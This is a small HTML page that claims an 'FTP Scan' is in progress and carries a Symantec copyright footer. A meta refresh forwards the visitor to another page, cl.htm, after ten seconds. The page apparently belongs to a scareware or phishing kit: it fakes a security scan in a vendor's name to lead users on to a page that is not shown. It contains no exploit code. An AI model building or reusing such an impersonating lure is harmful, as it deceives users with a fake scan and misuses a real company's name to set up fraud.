<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="refresh" content="10; URL=cl.htm">
<title>Welcome</title>
</head>

<body>

<div align="center">

<table border="0" width="100%" id="table11">
	<tr>
		<td>
		<img border="0" src="fjue7yhfi3.png" width="91" height="35"></td>
	</tr>
</table>
<table border="0" width="100%" id="table12" height="40">
	<tr>
		<td bgcolor="#FDC300">&nbsp;</td>
	</tr>
</table>
<table border="0" width="100%" id="table13">
	<tr>
		<td>&nbsp;<p>&nbsp;</p>
		<p align="center"><b><font face="Arial">FTP Scan in progress. 
		Please wait </font><font face="Arial" color="#213F89"> 
		<img border="0" src="retew63tw.gif" width="18" height="12"></font></b></p>
		<p align="center">&nbsp;</td>
	</tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<p align="center">&nbsp;</p>
<table border="0" width="100%" id="table14" height="40">
	<tr>
		<td bgcolor="#FDC300">&nbsp;</td>
	</tr>
</table>
<p align="center"><font face="Arial" size="1">Copyright Notice � 2019 Symantec. All rights reserved.</font></p>

</body>

</html>